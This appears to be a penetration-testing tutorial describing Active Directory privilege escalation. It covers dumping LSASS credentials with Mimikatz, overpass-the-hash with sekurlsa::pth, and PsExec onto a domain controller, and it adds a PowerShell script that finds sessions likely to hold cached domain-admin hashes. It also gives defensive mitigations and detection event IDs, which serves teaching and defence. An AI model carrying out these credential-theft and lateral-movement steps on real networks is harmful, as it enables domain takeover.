Introduction
Hey everyone, and welcome back! In this session, I’m going to show you one of my favorite methods for privilege escalation within an Active Directory environment. I’ll be starting from a scenario where I’ve already gained initial access to a regular workstation on the network, but I don’t have control over the domain controller itself… yet. 😉
Step 1: Dumping Passwords with Mimikatz
My first move on the compromised workstation is to fire up Mimikatz. This already assumes I have local admin (or at least SeDebugPrivilege) on the box, because what I’m about to do is read the memory of LSASS, the process that holds the credentials for every logon session on the machine. My goal is to dump all of that cached credential material. What I’m hoping for is that a domain administrator has, at some point, logged into this specific workstation interactively (console or RDP). If they have, their NTLM hash will be sitting right there in LSASS memory. The NTLM hash is just the MD4 hash of the account’s password; it isn’t reversible in any practical sense, but Windows accepts it in place of the password for authentication, which is all I need.
Step 2: The “Overpass the Hash” Technique
Once I have that precious NTLM hash, it’s time for some lateral movement. I use a technique called “overpass the hash.” The main idea is that Kerberos derives its RC4-HMAC key for a user directly from that user’s NTLM hash, so if I hold the hash, I hold a valid Kerberos key. I don’t have to forge anything: I hand the hash to a new logon session, and the first time that session talks to a domain resource, the KDC on the domain controller issues me a perfectly legitimate ticket-granting ticket (TGT) for the admin.
For those who don’t know, Kerberos is the authentication system Active Directory uses. It’s like a digital bouncer: you prove who you are once to the KDC and get a TGT, then trade that TGT for service tickets that let you into different parts of the network. One point worth being precise about, because it often gets muddled: this is not a golden ticket. A golden ticket is a TGT forged offline using the krbtgt account’s hash, which you only get after you already own the domain. Here the domain controller itself is issuing me a real TGT, and the only thing it checks is that I know the admin’s key.
Step 3: Launching a PowerShell Process
With the admin’s hash in hand, I use Mimikatz again (sekurlsa::pth) to spawn a PowerShell process in a new logon session on the workstation, with the admin’s NTLM hash injected as that session’s credential. The process itself runs locally on the workstation, not on the domain controller, and if I run whoami in it I still see my original low-privileged account, because pth only replaces the credentials used for outbound network authentication. The magic is that whenever that process reaches out to a domain resource, it authenticates as the administrator. So I get a direct line to the domain controller, all from the comfort of the workstation I originally compromised.
Step 4: Getting My Tickets, Please!
Now, even though I have a PowerShell process running, if I run klist in it I don’t have any Kerberos tickets yet, which limits what I can do. To fix this, I need to trigger some network authentication so the system requests a ticket for me. A simple way to do this is to access a share on the domain controller with the net use command, using the DC’s fully qualified name so that Kerberos is used rather than falling back to NTLM. This little nudge is all it takes: LSASS sends an AS-REQ using the injected hash as the key, receives the admin’s ticket-granting ticket, then trades it for a service ticket to the CIFS service on the DC. From here on, full interaction with the domain as the admin is unlocked.
Step 5: Gaining Full Control with PsExec
The final step is to upgrade my PowerShell process into a full-blown interactive command prompt running on the domain controller under the administrator’s account. For this, I use PsExec from the Sysinternals suite, which authenticates to the remote host with the tickets I now hold and spawns a process there.
In this particular scenario, I ran into a small hiccup because PsExec wasn’t already on the machine. No problem! I just quickly downloaded it from the official Sysinternals website directly onto the compromised workstation. After unzipping the files, I was able to launch PsExec and gain complete system-level access to the domain controller. Game over. 🏆
A Crucial Caveat
I want to stress one very important point: this specific attack only works if the domain administrator has previously logged into the workstation I compromised with a logon type that leaves credentials in LSASS (console, RDP, or cached interactive). If their credentials aren’t in memory, Mimikatz can’t grab them, and the whole attack falls apart. This is why it’s so important to enumerate who is logged in and what sessions are active during the initial stages of a penetration test. The same dependency is also the defensive lesson: keeping domain admins off workstations (tiered administration), Credential Guard, and the Protected Users group all remove that hash from LSASS. And for the blue team, the chain is not silent: sekurlsa::pth produces a 4624 logon on the workstation with logon type 9 (NewCredentials), and the TGT request it triggers shows up on the domain controller as a 4768 with ticket encryption type 0x17 (RC4) for an account that should be negotiating AES.
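Here is one way to do that enumeration from the compromised workstation before spending time on Mimikatz. This is an added example, not code from the original post; it joins the Win32_LoggedOnUser and Win32_LogonSession CIM classes to list every logged-on account with its logon type, and flags the types that normally leave reusable credential material in LSASS. It assumes it is run in an elevated PowerShell on the host you already control.

```powershell
# Added example (not from the original post). Run elevated on the compromised workstation.

# Logon type codes as reported in Win32_LogonSession.LogonType
$typeNames = @{
    2 = 'Interactive'; 3 = 'Network'; 4 = 'Batch'; 5 = 'Service'; 7 = 'Unlock'
    8 = 'NetworkCleartext'; 9 = 'NewCredentials'; 10 = 'RemoteInteractive'; 11 = 'CachedInteractive'
}
# Types that normally leave the user's credentials cached in LSASS; Network (3) does not.
$cachedTypes = 2, 7, 10, 11

$sessions = Get-CimInstance -ClassName Win32_LogonSession
$users    = Get-CimInstance -ClassName Win32_LoggedOnUser

$users | ForEach-Object {
    # Dependent is the session, Antecedent is the account; join them on LogonId
    $sess = $sessions | Where-Object LogonId -eq $_.Dependent.LogonId
    if (-not $sess) { return }
    [pscustomobject]@{
        Account      = "$($_.Antecedent.Domain)\$($_.Antecedent.Name)"
        LogonId      = $sess.LogonId
        LogonType    = $typeNames[[int]$sess.LogonType]
        AuthPackage  = $sess.AuthenticationPackage
        Since        = $sess.StartTime
        LikelyCached = ([int]$sess.LogonType -in $cachedTypes)
    }
} | Sort-Object Account, LogonId | Format-Table -AutoSize
```

Anything with LikelyCached set to True and a domain account you care about is worth a sekurlsa::logonpasswords run; if the only domain sessions you see are type 3, the hash you want is not on this box and you should keep moving rather than dumping LSASS for nothing. quser gives a quicker but coarser view of the same information.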
There are many ways to climb the privilege ladder in Active Directory, but this is one of my go-to methods. I’ll be back with more tactics and techniques in future videos, so stay tuned!